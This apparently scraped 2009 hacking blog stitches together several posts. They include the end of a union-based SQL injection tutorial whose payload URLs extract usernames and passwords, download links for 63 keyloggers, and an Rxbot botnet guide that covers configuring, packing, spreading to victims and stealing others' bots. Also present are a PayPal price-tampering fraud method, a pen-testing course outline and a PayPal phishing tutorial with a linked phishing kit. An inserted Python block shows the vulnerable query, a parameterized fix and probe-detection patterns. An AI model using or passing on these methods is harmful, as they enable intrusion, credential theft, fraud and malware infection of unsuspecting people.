and you got the column user_password and the table members. Now you want to see if there is an admins table with a column like pass. So you would add to the end

AND column_name NOT IN ('value'). This says choose the first row where the column "column_name" doesn't have this value. So if you wanted to get the next user column, you would do

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.columns WHERE column_name LIKE '%pass%' AND column_name NOT IN ('user_password') --

or to be safer, in case the admins table also has the column user_password, you could make it check the table name like:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.columns WHERE column_name LIKE '%pass%' AND table_name NOT IN ('user_password') --

Then say you got the column password and the table backup_members. This is only a backup table, so you want to keep going until you get the admins table. Then you would take the URL from before and add ,'backup_members' to the NOT IN ('user_password') like this:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.columns WHERE column_name LIKE '%pass%' AND table_name NOT IN ('user_password', 'backup_members') --

and then you would check the table name like this:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.columns WHERE table_name LIKE '%pass%' AND table_name NOT IN ('user_password', 'backup_members') --

You would continue adding ,'table_name' until you finally got to the admins table (if there is one!)

Keep in mind magic quotes must be off for this. Again, you will find out how to bypass magic quotes in cases like this later.

Now let's say the MySQL version was only 4 and information_schema IS NOT present. So we would have to use another method to try to get the tables/columns of interest. Basically, you would first look in the errors and see if they disclose the whole query or at least the table and column (e.g. Mysql Error in 'userpass FROM users where id=1''), and then resort to good old guessing. These two steps mainly revolve around luck and poor error message configuration.

So let me explain the error method first. Let's say you do this:

http://site.com/script.php?id=1'



and get the error:

MySQL Syntax Error in the query 'SELECT name FROM sb_news WHERE id = 1''

In the above example, the tables have a prefix (sb). Prefixes, where they are used, are usually present on every table and are very common on sites. Now that you know the prefix, you would guess sb_users, sb_members, sb_admins, sb_accounts, etc. You see that the column has no prefix, so after you get the table you would try username, password, user_password, user_pass, login, etc. If the error was

MySQL Syntax Error in the query 'SELECT name FROM news WHERE id = 1''

Then you would know the tables have no prefix and you wouldn't have to guess with the prefix. However, errors like this are very uncommon. A more common error would be:

Mysql Error: Syntax error by '1' AND g_embedable=1 LIMIT 1' at line 1

This would show you a column name in the particular table. This is useful because you can now assume either all the columns in the database have the g_ prefix, or you could somehow figure out why it has the prefix (for example, if it was a page of games, you could guess that g stood for games), then see how you can modify it for the users table (so if the table was users, it could be u_password, u_pass, u_username, u_user, u_login, etc). Of course, you would have to guess the tables outright, and whether they have prefixes.

But once you have this info, how exactly do you check if the table/column exists? You would use a UNION ALL SELECT that selects NULL (nothing) from the table you're guessing. For example:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,null FROM table (remember to use the right number of columns)

Now if you get an error saying Mysql Error: Table 'table' Not found in script.php on line 7, or any similar error, you know the table doesn't exist.

Once you have guessed the table correctly, you would have to guess the column. You do this by changing a NULL to the column name you're guessing and seeing if there is an error. For example:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,password FROM users --

If there is no error and the page loads, then you know the column is password. If there is an error saying invalid column, you have to keep guessing. Remember to use a column that does NOT cause a conversion error since the error may be misleading.

Now that you have the column and table you want to steal data from, we'll move on to the next step!





Subsection 2.9 - Step 8) Get your data

This is the final part of this tutorial, and easy as hell!

So we have our table and column. Let's say the table is users and the two columns you got are username and password. So all we have to do to get the data from those columns is use a simple select query in our URL and LIMIT to sift through the rows! So with username and password in table users, we would do this:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,username FROM users --

Then check the page where the data is displayed and you'll see the username!

Now for the password:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,password FROM users --

Then check the page where the username was and you'll see the password! Now, instead of doing two separate queries for the username and password, there are two ways to get the data out at the same time.

The first is if two columns display data to the page. Say columns 2 and 3 displayed data in our UNION ALL SELECT null,null,null. So we would do

http://site.com/script.php?id=1' UNION ALL SELECT null,username,password FROM users --

Then you can look on the page for the username AND password. But they are on different parts of the page, aren't they? To get them together, we can use the function concat(). concat() joins strings; the syntax is concat(string1,string2,etc). You can put in as many strings as you want, separated by commas. You can use either column names or actual strings enclosed in 's (magic quotes must be off). The benefit is the data is together and we only need one column that outputs.

So we can do this:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,concat(username,password) FROM users --

But then there would be no distinction between the username and password. So we should add a --- between them: concat(username,'---',password). Again, magic quotes MUST be off for this to work. An example would be:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,concat(username,'---',password) FROM users --

Then you will see the username and password separated by ---'s on the page!

Now, what if you didn't want the first user's password? Then you would use LIMIT as I discussed earlier. You would tell LIMIT to start from the 2nd row (which is actually 1 for computers since 0 is the first) and to choose 1 row (limit 1,1). So you would do

http://site.com/script.php?id=1' UNION ALL SELECT null,null,concat(username,'---',password) FROM users limit 1,1 --

Then you would check the page again, and in the place you saw the previous username and password you would see the second user's in the same exact format. Now if you wanted the next user, you would change limit 1,1 to limit 2,1, then the next would be limit 3,1, etc., until you have all the users you want!

And that concludes part I of my tutorial! Hope you liked it!
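The steps above in working code, as an added example that is not part of the original tutorial: the string-built query the tutorial exploits beside its parameterized fix, with an in-memory SQLite database standing in for MySQL, plus a check that flags the probe patterns from steps 5 to 7 in constructed access-log lines. The table names, rows, log lines and pattern names are all assumed sample values.

```python
"""Union-based SQL injection: the vulnerable pattern, its fix, and a log check.

Added example, not code from the original tutorial. An in-memory SQLite
database with constructed rows stands in for MySQL so it runs offline; the
column-count error text differs from MySQL's, but the UNION mechanics the
tutorial walks through are the same. Every table, column and log line here
is made up for the demonstration.
"""
import re
import sqlite3
from urllib.parse import parse_qs, urlparse


def make_db() -> sqlite3.Connection:
    """Constructed schema mirroring the tutorial's news/users examples."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news (id INTEGER, title TEXT, data TEXT, author TEXT);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'Hello', 'First post body', 'alice');
        INSERT INTO users VALUES (1, 'admin', 'hash-of-admin-pw');
        """
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, raw_id: str) -> list:
    """The pattern the tutorial exploits: the URL value is pasted into the SQL,
    so a quote closes the string and a UNION appends attacker-chosen rows."""
    sql = f"SELECT title,data,author FROM news WHERE id = '{raw_id}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, raw_id: str) -> list:
    """Same query with a bound parameter: the value is data, never SQL text."""
    sql = "SELECT title,data,author FROM news WHERE id = ?"
    return conn.execute(sql, (raw_id,)).fetchall()


# Traces the tutorial's probes (steps 5 to 7) leave in a decoded query string.
PROBE_PATTERNS = {
    "trailing-quote": re.compile(r"'\s*$"),  # low confidence on its own
    "quote-then-union": re.compile(r"'\s*union\s+(all\s+)?select\b", re.I),
    "null-padding": re.compile(r"\bselect\s+null\s*,", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "version-probe": re.compile(r"@@version", re.I),
}


def probe_indicators(url: str) -> list:
    """Names of the probe patterns found in any query parameter of the URL."""
    hits = set()
    params = parse_qs(urlparse(url).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            for label, pattern in PROBE_PATTERNS.items():
                if pattern.search(value):
                    hits.add(f"{name}:{label}")
    return sorted(hits)


REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Constructed Common Log Format lines following the tutorial's probe sequence.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Jan/2009:10:00:01 +0000] "GET /script.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [25/Jan/2009:10:00:07 +0000] "GET /script.php?id=1%27 HTTP/1.1" 500 96',
    '10.0.0.5 - - [25/Jan/2009:10:00:19 +0000] "GET /script.php?id=1%27%20UNION%20ALL'
    '%20SELECT%20null,null,3%20-- HTTP/1.1" 200 520',
    '10.0.0.5 - - [25/Jan/2009:10:00:31 +0000] "GET /script.php?id=1%27%20UNION%20ALL'
    '%20SELECT%20null,null,@@version%20-- HTTP/1.1" 200 530',
]


def flag_log_lines(lines: list) -> list:
    """Scan log lines; return (line number, indicators) for each suspicious one."""
    flagged = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            hits = probe_indicators("http://host" + match.group(1))
            if hits:
                flagged.append((number, hits))
    return flagged


def main() -> None:
    conn = make_db()
    probe = "1' UNION ALL SELECT null,null,3 --"
    print("vulnerable:", vulnerable_lookup(conn, probe))  # extra (None, None, 3) row
    print("parameterized:", safe_lookup(conn, probe))  # [] because no row has that id
    try:
        vulnerable_lookup(conn, "1' UNION ALL SELECT 1,2 --")
    except sqlite3.OperationalError as err:
        print("column-count mismatch:", err)  # the error step 5 relies on
    for number, hits in flag_log_lines(SAMPLE_LOG):
        print(f"log line {number}: {', '.join(hits)}")


if __name__ == "__main__":
    main()
```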

Sunday, January 25, 2009

63 Keyloggers Ready For Download

http://rapidshare.com/files/106017345/KEYLOGGERS_THEBEST.rar

1 007 Keylogger Spy Software 3.873
2 Active Key Logger 2.4
3 Activity Keylogger 1.80.21
4 Activity Logger 3.7.2132
5 ActMon Computer Monitoring 5.20
6 Actual Spy 2.8
7 Advanced Invisible Keylogger v1.9
8 Advanced Keylogger 1.8
9 Ardamax Keylogger 2.9
10 BlazingTools Perfect Keylogger 1.68
11 Blazingtools Remote Logger v2.3
12 Data Doctor KeyLogger Advance v3.0.1.5
32 Local Keylogger Pro 3.1
14 ExploreAnywhere Keylogger Pro 1.7.8
15 Family Cyber Alert 4.06
16 Family Keylogger 2.80
17 Firewall bypass Keylogger 1.5
18 Free Keylogger 2.53
19 Ghost Keylogger 3.80
20 Golden Eye 4.5
21 Golden KeyLogger 1.32
22 Handy Keylogger 3.24 build 032
23 Home Keylogger 1.77
24 Inside Keylogger 4.1
25 iOpus Starr PC and Internet Monitor 3.23
26 iSpyNow v2.0
27 KeyScrambler 1.3.2
28 Keystroke Spy 1.10
29 KGB Keylogger 4.2
30 KGB Spy 3.84
31 LastBit Absolute Key Logger 2.5.283
32 Metakodix Stealth Keylogger 1.1.0
33 Network Event Viewer v6.0.0.42
34 OverSpy v2.5
35 PC Activity Monitor Professional 7.6.3
36 PC Spy Keylogger 2.3 build 0313
37 PC Weasel 2.5
38 Personal PC Spy v1.9.5
39 Power Spy 6.10
40 Powered Keylogger v2.2.1.1920
41 Quick Keylogger 2.1
42 Radar 1.0
43 Real Spy Monitor 2.80
44 Real Spy Monitor 2.80
45 Remote Desktop Spy 4.04
46 Remote KeyLogger 1.0.1
47 Revealer Keylogger Free 1.33
48 SC Keylogger Pro 3.2
49 Smart Keystroke Recorder Pro
50 Spector Pro 6.0.1201
51 SpyAnytime PC Spy 2.42
52 SpyBuddy 3.7.5
53 Spytech SpyAgent 6.02.07
54 Spytector 1.3.5
55 Stealth Key Logger 4.5
56 System keylogger 2.0.0
57 Tim's Keylogger 1.0
58 Tiny Keylogger 2.0
59 Total Spy 2.7
60 Windows Keylogger 5.04
61 Win-Spy Pro 8.9.109
62 XP Advanced Keylogger 2.5
63 XPCSpy Pro version 3.01

BOTS

There are many tutorials around but I thought I would post one to help people.

In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source: rx-asn-2-re-worked v3, a stable mod of rxbot that is 100% functional and not crippled. If you want to download it, you can below:
Code:

http://rapidshare.com/files/28549191/rx-asn-2-re-worked_v3.rar.html

Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.

Q:What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC (secretly, they don't know this). Once done the computer is now referred to as a "zombie".
Depending on the source you used, the bot can do several things.

But once again depending on the source you can :
Keylog their computer, take pictures of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spam other irc channels and overrun a channel and even perform IRC "Takeovers".
Once again depending on the bot it may be able to kill other fellow competitor bots.
Or even kill AV/FW upon startup.
Add itself to registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible !

There are the infected computers ("bots"), the attacker, the server, and the victim.

Quote:
while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.

Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."

Botnets are being used for Google Adword click fraud, according to security watchers.

Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.
---------------
Ignore anything about using the server editor, but this tutorial shows how to make an irc channel and spread bots:
Code:

http://rapidshare.com/files/18798734/DonttCare_Server_Editor_TuT..html

Here we go ladies and gentlemen
Follow the tutorial:

I. Setting up the C++ compiler: (easy)
Download
Code:

http://www.megaupload.com/?d=SUHPYZRX

Code:

Pass: itzforblitz
Serial: 812-2224558

2. Run setup.exe and install. Remember to input serial

3. Download and install the Service Pack 6 (60.8 mb)
Code:

http://www.microsoft.com/downloads/details.aspx?familyid=a8494edb-2e89-4676-a16a-5c5477cb9713&displaylang=en

After that Download and install:

Windows SDK (1.2 mb)
Code:

http://www.megaupload.com/?d=YH3SS78I

Pass: itzforblitz

II. Configuring the C++ compiler (easy)

1. Open up Microsoft Visual C++ Compiler 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\LIB

4. Now put them in this order: (use up and down arrows)

(it does not matter whats below those lines)

III. Configuring your bot: (easy)

1. Download and unpack:
Rxbot 7.6 (212.3 kb)
Code:

http://rapidshare.com/files/21854222/botsrc7.6rx.rar.html

2. You should see an Rxbot 7.6 folder
3. Open configs.h in the Rxbot 7.6 folder and edit these lines only:

Quote:
Put in quotations:
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass

IV. Building your bot: (very easy)

1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:

5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

YOU'RE DONE !!!! Now get the rbot and pack it (use the tool in the third post: open rbot and click "Protect") and send it to some idiots. Follow the tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !

Command list
Download Command list
Code:

http://rapidshare.com/files/21542921/cmands.html

Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
Download mIRC
Code:

http://dw.com.com/redir?edId=3&siteId=4&oId=3000-2150_4-10001733&ontId=2150_4&spi=037458d618c9304926b7944fed9d4095&lop=link&tag=tdw_dltext<ype=dl_dlnow&pid=10873492&mfgId=50355&merId=50355&pguid=94gKyQoPjAQAADdnUHYAAAAu&destUrl=http%3A%2F%2Fwww.download.com%2F3001-2150_4-10873492.html%3Fspi%3D037458d618c9304926b7944fed9d4095%26part%3Ddl-mIRC

How to secure your bots:

Don't be an arse, it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key. One must upload their bot to a direct link (tdotnetwork is excellent)
and update the channel topic and run:
Quote:
@update
Code:

http://www.mybot.com/download/SMSPRO.exe

82

The
Code:

http://mybot.com

is your bot's download link and the 82 can be any number(s)
Now steal their bots and have them join your channel
To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.

To secure your self:

It is fairly easy to secure your bots, here is how:

1. When you are in your channel, right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:

This way no one besides you or another op can set the channel topic
Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or an op (+o) cannot talk. They will still log in and follow commands, however there will be no output.

Good IRC Servers:

I would recommend running your botnet on a private server.
If you would like to set up a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he knows that the IRC server is not doing anything illegal. If an admin refuses, don't get angry. It is his/her server after all.

Saturday, January 24, 2009

[TUT] Get anything for $0.01 from paypal

Note: It won't work on products because it sends the seller an email along the lines of "you have received $0.01 from (your paypal name) for (the product)". This works ONLY on automated software scripts where it detects that you gave a payment and emails you a link to download the software.
Also, this is an educational-only guide. I don't know if it is legal in some countries or all.

You only need FireFox and the Tamper Data plugin. Install it as usual and restart FireFox.
Go to Tools -> Tamper data to open the plugin's window.
Don't click anything yet.

Now go to any page where you want to buy something (for example, an ebook). Note, you need to find a place that supports paypal or paypal shopping carts.
[Image: 1232737021024647100.png]
Now, before doing anything, go back to Tamper's window and press "Start Tamper".
[Image: 1232737234031307500.png]
Don't visit any other site and don't click any other link. YOU ONLY NEED to click on the link from the site that redirects you to paypal.
The Tamper with request window will pop up. Click the Tamper button.
[Image: 1232737276006250200.png]
Now, you need to modify the post variables.
Find the parameter called amount and change the value to 0.01 because that is the lowest amount PayPal will process. When you are done click the OK button at the bottom of the window.
[Image: 1232737308052686400.png]
You will go to paypal's page.
You are done.

Thursday, January 22, 2009

Hacking

Hacking Training Course

Package Includes:
Featuring live instructor-led classroom sessions with full audio, video and demonstration components
Printable courseware
300+ Penetration Testing Review Questions
eWorkbook - 725 pages Student eWorkbook by Logical Security

Module 1

* Ethical Hacking and Penetration Testing
* Security 101
* Hacking Hall of Fame
* What are Today's hackers Like?
* Today's Hackers
* Risk Management
* Evolution of Threats
* Typical Vulnerability Life Cycle
* What is Ethical Hacking?
* Rise of the Ethical Hacker
* Types of Security Test
* Penetration Test (Pen-test)
* Red Teams
* Testing Methodology
* VMWare Workstation
* Windows and Linux Running VMWare
* Linux Is a Must
* Linux Survival Skills
* Useful vi Editor Commands
* Module 1 Review

Module 2

* Footprinting and Reconnaissance
* Desired Information
* Find Information by the Target (Edgar)
* terraserver.microsoft.com
* Network Reconnaissance & DNS Search
* Query Whois Databases
* Command-Line Whois Searches
* ARIN whois: Search IP Address Blocks
* SamSpade Tool and Website
* Internet Presence
* Look Through Source Code
* Mirror Website
* Find Specific Types of Systems
* Big Brother
* AltaVista
* Specific Data Being Available?
* Anonymizers
* Countermeasures to Information Leakage
* Social Engineering
* DNS Zone Transfer
* Nslookup command-line utility
* Zone Transfer from Linux
* Automated Zone Transfers
* Zone Transfer Countermeasures
* www.CheckDNS.net
* Tracing Out a Network Path
* tracert Output
* Free Tools
* Paratrace
* War Dialing for Hanging Modems
* Manual and Automated War Dialing
* Case Study
* Guide Dogs for the Blind: Pairing blind people with Guide Dogs since 1942
* Footprinting Countermeasures
* Demo - Footprinting & Info Gathering
* Module 2 Review

Module 3

* TCP/IP Basics and Scanning
* The OSI Model
* TCP/IP Protocol Suite Layers
* Encapsulation
* Data-Link Protocols
* IP - Internet Protocol, Datagram (Packet)
* ICMP Packets
* UDP – User Datagram Protocol
* UDP Datagram
* TCP – Transmission Control Protocol
* TCP Segment
* TCP/IP 3-Way Handshake and Flags
* TCP and UDP Ports
* Ping Sweeps
* Good Old Ping, Nmap, TCP Ping Sweep
* TCP Sweep Traffic Captured
* Unix Pinging Utilities
* Default TTLs
* Pinging Countermeasures
* Port Scanning
* Nmap
* Advanced Probing Techniques
* Scanrand
* Port Probing Countermeasures
* Watch Your Own Ports
* Demo - Scanning Tools
* Module 3 Review

Module 4

* Enumeration and Verification
* Operating System Identification
* Differences Between OS TCP/IP Stack
* Nmap -O
* Active vs Passive Fingerprinting
* Xprobe/Xprobe2
* Countermeasures
* SNMP Overview
* SNMP Enumeration
* SMTP, Finger, and E-mail Aliases
* Gleaning Information from SMTP
* SMTP E-mail Alias Enumeration
* SMTP Enumeration Countermeasures
* CIFS/SMB
* Attack Methodology
* Find Domains and Computers
* NetBIOS Data
* NBTscan
* NULL Session
* Local and Domain Users
* Find Shares with net view
* enum: the All-in-one
* Winfo and NTInfoScan (ntis.exe)
* Digging in the Registry
* NetBIOS Attack Summary
* NetBIOS Countermeasures
* What’s this SID Thing Anyway?
* Common SIDs and RIDs
* whoami
* RestrictAnonymous
* USER2SID/SID2USER
* psgetsid.exe and UserDump Tool
* LDAP and Active Directory
* GUI Tools to Perform the Same Actions
* Demo - Enumeration
* Module 4 Review

Module 5

* Hacking & Defending Wireless/Modems
* Phone Numbers & Modem Background
* Phone Reconnaissance
* Modem Attacks
* Wireless Reconnaissance
* Wireless Background
* Wireless Reconnaissance Continued
* Wireless Sniffing
* Cracking WEP Keys
* Defending Wireless
* Module 5 Review

Module 6

* Hacking & Defending Web Servers
* Web Servers in General: HTTP
* Uniform Resource Locator: URL
* Apache Web Server Functionality
* Apache: Attacking Mis-configurations
* Apache: Attacking Known Vulnerabilities
* Defending Apache Web Server
* Microsoft Internet Information Server (IIS)
* IIS: Security Features
* IIS: Attacking General Problems
* IIS: IUSER or IWAM Level Access
* IIS: Administrator or Sys Level Access
* IIS: Clearing IIS Logs
* IIS: Defending and Countermeasures
* Web Server Vulnerability Scanners
* Demo - Hacking Web Servers
* Module 6 Review

Module 7

* Hacking & Defending Web Applications
* Background on Web Threat & Design
* Basic Infrastructure Information
* Information Leaks on Web Pages
* Hacking over SSL
* Use the Source, Luke…
* Functional/Logic Testing
* Attacking Authentication
* Attacking Authorization
* Debug Proxies: @stake webproxy
* Input Validation Attacks
* Attacking Session State
* Attacking Web Clients
* Cross-Site Scripting (XSS) Threats
* Defending Web Applications
* Module 7 Review

Module 8

* Sniffers and Session Hijacking
* Sniffers
* Why Are Sniffers so Dangerous?
* Collision & Broadcast Domains
* VLANs and Layer-3 Segmentation
* tcpdump & WinDump
* Berkley Packet Filter (BPF)
* Libpcap & WinPcap
* BUTTSniffing Tool and dSniff
* Ethereal
* Mitigation of Sniffer Attacks
* Antisniff
* ARP Poisoning
* MAC Flooding
* DNS and IP Spoofing
* Session Hijacking
* Sequence Numbers
* Hunt
* Ettercap
* Source Routing
* Hijack Countermeasures
* Demo - Sniffers
* Module 8 Review

Module 9

* Hacking & Defending Windows Systems
* Physical Attacks
* LANMan Hashes and Weaknesses
* WinNT Hash and Weaknesses
* Look for Guest, Temp, Joe Accounts
* Direct Password Attacks
* Before You Crack: Enum Tool
* Finding More Account Information
* Cracking Passwords
* Grabbing the SAM
* Crack the Obtained SAM
* LSA Secrets and Trusts
* Using the Newly Guessed Password
* Bruteforcing Other Services
* Operating System Attacks
* Hiding Tracks: Clearing Logs
* Hardening Windows Systems
* Strong 3-Factor Authentication
* Creating Strong Passwords
* Authentication
* Windows Account Lockouts
* Auditing Passwords
* File Permissions
* Demo - Attacking Windows Systems
* Module 9 Review

Module 10

* Hacking & Defending Unix Systems
* Physical Attacks on Linux
* Password Cracking
* Brute Force Password Attacks
* Stack Operation
* Race Condition Errors
* Format String Errors
* File System Attacks
* Hiding Tracks
* Single User Countermeasure
* Strong Authentication
* Single Sign-On Technologies
* Account Lockouts
* Shadow Password Files
* Buffer Overflow Countermeasures
* LPRng Countermeasures
* Tight File Permissions
* Hiding Tracks Countermeasures
* Removing Unnecessary Applications
* DoS Countermeasures
* Hardening Scripts
* Using SSH & VPNs to Prevent Sniffing
* Demo - Attacking Unix Systems
* Module 10 Review

Module 11

* Rootkits, Backdoors, Trojans & Tunnels
* Types Of Rootkits
* A Look at LRK
* Examples of Trojaned Files
* Windows NT Rootkits
* NT Rootkit
* AFX Windows Rootkit 2003
* Rootkit Prevention Unix
* Rootkit Prevention Windows
* netcat
* netcat: Useful Unix Commands
* netcat: What it Looks Like
* VNC-Virtual Network Computing
* Backdoor Defenses
* Trojans
* Back Orifice 2000
* NetBus
* SubSeven
* Defenses to Trojans
* Tunneling
* Loki
* Other Tunnels
* Q-2.4 by Mixter
* Starting Up Malicious Code
* Defenses Against Tunnels
* Manually Deleting Logs
* Tools to Modify Logs
* Demo - Trojans
* Module 11 Review

Module 12

* Denial of Service and Botnets
* Denial-of-Service Attacks
* CPUHog
* Ping of Death
* Teardrop Attacks
* Jolt2
* Smurf Attacks
* SYN Attacks
* UDP Floods
* Distributed DoS
* DDoS Tool: Trin00
* Other DDoS Variation
* History of Botnets
* Anatomy of a Botnet
* Some Common Bots
* Demo - Denial of Service
* Module 12 Review

Module 13

* Automated Pen Testing Tools
* General: Definitions
* General:What?
* General: Why?
* Core Impact™ Framework
* Core Impact™ Operation
* Canvas™ Framework
* Canvas™ Operation
* Metasploit Framework
* Metasploit Operation
* Demo - Automated Pen Testing
* Module 13 Review

Module 14

* Intrusion Detection Systems
* Types of IDSs
* Network IDSs
* Distributed IDSs (DIDSs)
* Anomaly Detection
* Signature Detection
* Common IDS Software Products
* Introduction to Snort
* Attacking an IDS
* Eluding Techniques
* Testing an IDS
* Hacking Tool - NIDSbench
* Hacking Tool - Fragroute
* Hacking Tool - SideStep
* Hacking Tool - ADMmutate
* Other IDS Evasion Tools
* Demo - IDS and Snort
* Module 14 Review

Module 15

* Firewalls
* Firewall Types
* Application Layer Gateways
* ALGs (Proxies)
* Stateful Inspection Engine
* Hybrid Firewall
* Host-Based Firewall
* Network-Based Firewall
* DMZ (Demilitarized Zone)
* Back-to-Back Firewalls
* Bastion Hosts
* Control Traffic Flow
* Multiple DMZs
* Controlling Traffic Flow
* Why Do I Need a Firewall?
* What Should I Filter?
* Egress Filtering
* Network Address Translation (NAT)
* Firewall Vulnerabilities
* IPTables/NetFilter
* Default Tables and Chains
* iptables Syntax 1
* iptables Syntax 2
* Sample IPTables Script 1
* Sample IPTables Script 2
* Persistent Firewalls
* Firewall Identification
* Firewalk
* Tunneling with Loki
* Tunneling with NetCat/CryptCat
* Port Redirection with Fpipe
* Denial-of-Service Attacks Risk?
* Demo - Firewalls and IP Tables
* Module 15 Review

Module 16

* Honeypots and Honeynets
* What Is a Honeypot?
* Advantages and Disadvantages
* Types and Categories of Honeypots
* Honeypot: Tarpits
* Honeypot: Kfsensor
* Honeypot: Honeyd
* Sample Honeyd Configuration
* High-Interaction Honeypot
* Project HoneyNet
* Types of Honeynets
* The Main Difference is Data Control
* GEN II Data Control: Honeywall CD
* Gen II Data Capture: Sebek & Sebek II
* Automated Alerting
* Testing
* Legal Issues
* Demo - Setting up a Honeypot
* Module 16 Review

Module 17

* Ethics and Legal Issues
* The Costs
* Relation to Ethical Hacking?
* The Dual Nature of Tools
* Good Instead of Evil?
* Recognizing Trouble When It Happens
* Emulating the Attack
* Security Does Not Like Complexity
* Proper and Ethical Disclosure
* CERT’s Current Process
* Full Disclosure Policy
* Organization for Internet Safety (OIS)
* What Should We Do from Here?
* Legal Meets Information Systems
* Addressing Individual Laws
* 18 USC SECTION 1029
* 18 USC SECTION 1030
* 1030: Worms and Viruses
* Blaster Worm Attacks
* Civil vs. Criminal
* 18 USC SECTIONS 2510 and 2701
* Digital Millennium Copyright Act
* Cyber Security Enhancement Act
* Module 17 Review
* Course Closure
* Enjoy M8's


http://www.ziddu.com/download/3269041/NewTextDocument2.txt.html

Hacking Paypal Complete Tutorial

Many know PayPal phishing and have hacked many PayPal accounts! This tutorial is not only for newbies but also for PP phishers!

I am going to cover various methods of cracking and phishing PayPal accounts!

Cracking Accounts!

Well! Cracking involves many methods: social engineering, guessing, and so on.
But the probability of success with this method is very low!

Social Engineering:
In this method you know whom you are going to hack and have contact with them!

1. Let's consider that you are making some deals with some person whose PP you are going to hack,
so you would probably know his PayPal e-mail...
2. Now try to collect as much info as you possibly can from him, like phone numbers and address [for the address, you could make a transaction with him and easily obtain his address].
3. Now go to the PayPal website and click on "Forgot Password" or "Forgot E-mail". Prefer the forgot e-mail method; it is a bit easier!
Try with all the info you have about him! This should most probably work!

Getting more info about the victim!
If you select forgot password on the PayPal site, after entering the e-mail and the visual confirmation text in the proper box, you could see a drop-down box
which contains the last digits of credit cards, bank accounts and phone numbers!
It's better to take a note of all these!

[Try cracking with this info]

Lets come to the main part! Phishing

The current situation has become worse! Even if you successfully phished a PP account, you get the SECURITY MEASURE limitation in minutes!

So we have to start a new method of phishing!

Before going further, download the phisher [the code has not been completed; those who know how can download it and modify it a bit]

Quote:
Code:
http://www.bw-network.co.cc/PPPhisher.rar
Steps:

1. Hmmm. OK, you've got your phisher! And as I said, you should have found out the last 2 digits of the victim's CC!

2. Now put in your link as

Code:
http://ur_site.com/index.php?cc=XX [XX = last two digits of the CC number you got]
3. Now that's it, your phisher is all set, and now you only have to send the link to your victim!


E-mail Format:


Quote:

PayPal

PayPal – The safer, easier way to pay
  • Use your credit card without exposing your card number to merchants.
  • Speed through checkout without stopping to enter your card number or address.
  • Send money to family and friends for free.

Fight fake emails
  • Make sure you're using the latest internet browser.
